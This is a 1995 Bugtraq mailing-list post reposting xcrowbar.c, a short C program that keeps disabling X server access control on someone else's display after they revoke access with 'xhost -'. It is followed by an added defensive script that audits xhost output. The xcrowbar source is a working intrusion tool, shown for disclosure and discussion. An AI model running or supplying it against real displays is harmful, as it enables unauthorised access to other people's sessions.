Bugtraq mailing list archives
xcrowbar
From: wam () cs purdue edu (William McVey)
Date: Wed, 11 Jan 1995 13:27:36 -0500
der Mouse wrote:
> What's xcrowbar, and how does it "turn[] off the authority mechanisms altogether"? In my experience, only clients running on the local host, or the xdm host if the server was started with xdm, can fiddle with the access control mechanisms.
Since several people have asked me about xcrowbar in private mail, I'm just going to reply to the group. xcrowbar was posted to comp.security.unix a few months back. Since the source code is so short and the problem (people give access to their displays to untrustworthy people) has a known solution (only give trustworthy people access to your display), I'm reposting the article here. I've attached the original article (minus a few headers) to the bottom of this mail. It should be obvious what it does. As for only the local host or xdm host being able to "fiddle with the access control mechanism", I highly doubt that the statement is true. X servers (well, at least the distributed ones) don't pay any special attention to whether a client is local or remote.
> In any case, yes, it's true that "xhost -" doesn't magically mean you're safe again. What I do, to get the convenience of "xhost -" without giving up quite as much security, is I run a front-end program that accepts connections, ...
> <snip>

I don't suppose the program you run is freely available someplace?

 -- William

---- Begin article about xcrowbar ----
Article: 8570 of comp.security.unix
From: matt () cs su oz au (Robert Matthew Barrie)
Newsgroups: comp.security.unix
Subject: xcrowbar.c
Date: 1 Oct 1994 05:32:44 GMT
Organization: Basser Department of Computer Science, University of Sydney
Distribution: world
Message-ID: <36is9s$qrb () staff cs su oz au>

Like I said, a simple program that lets you do a XDisableAccessControl() on a display if someone decides to "xhost -" you after you have a pointer to their display.

matt

--- cut here
#include <stdio.h>
#include <X11/Xlib.h>
#include <ctype.h>

main (int argc, char *argv[])
{
    Display *dpy;
    char *dis = NULL;
    int c;

    dis= argv[1];
    if ((dpy = XOpenDisplay(dis))==NULL){
        perror("could not open window");
        exit(0);
    }
    while ((c=getchar())!='q')
        XDisableAccessControl(dpy);
    XCloseDisplay(dpy);
}
---- End article about xcrowbar ----
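A defender-side check for the condition this thread describes, added here as an example and not part of the original post: it reads the text that `xhost` prints when run with no arguments and flags a display whose access control has been switched off or that still lists host-wide grants. The function name `audit_xhost`, the severity labels, the exit codes and the sample host and user names are this example's own; it assumes the two status lines and the `SI:localuser:` entry prefix printed by current xhost releases.

```shell
#!/bin/sh
# Added example: audit the text printed by `xhost` run with no arguments.
# Reads that text on stdin and prints one finding per line.
# Exit status: 0 = nothing flagged, 1 = host-wide grants listed,
#              2 = access control disabled, 3 = input not recognized.
audit_xhost() {
    awk '
    NR == 1 && /^access control disabled/ { state = "off"; next }
    NR == 1 && /^access control enabled/  { state = "on";  next }
    NR == 1 { exit }                      # unknown first line: state stays empty
    NF == 0 { next }
    # A server-interpreted localuser entry names one account, not a host.
    /^SI:localuser:/ { print "INFO: per-user grant: " $0; next }
    # Any other entry (bare host name, INET:, LOCAL:) admits every user there.
    { print "WARN: host-wide grant: " $0; hosts++ }
    END {
        if (state == "")    { print "UNKNOWN: not xhost output"; exit 3 }
        if (state == "off") { print "CRIT: access control disabled"; exit 2 }
        exit (hosts > 0 ? 1 : 0)
    }'
}

# Constructed sample inputs (not captured from a real server).
sample_disabled() {
    printf '%s\n' 'access control disabled, clients can connect from any host'
}
sample_hosts() {
    printf '%s\n' \
        'access control enabled, only authorized clients can connect' \
        'INET:build01.example.org' \
        'SI:localuser:alice'
}
sample_clean() {
    printf '%s\n' 'access control enabled, only authorized clients can connect'
}
```

On a live display, run `xhost | audit_xhost` from a periodic job and alert on a non-zero exit status.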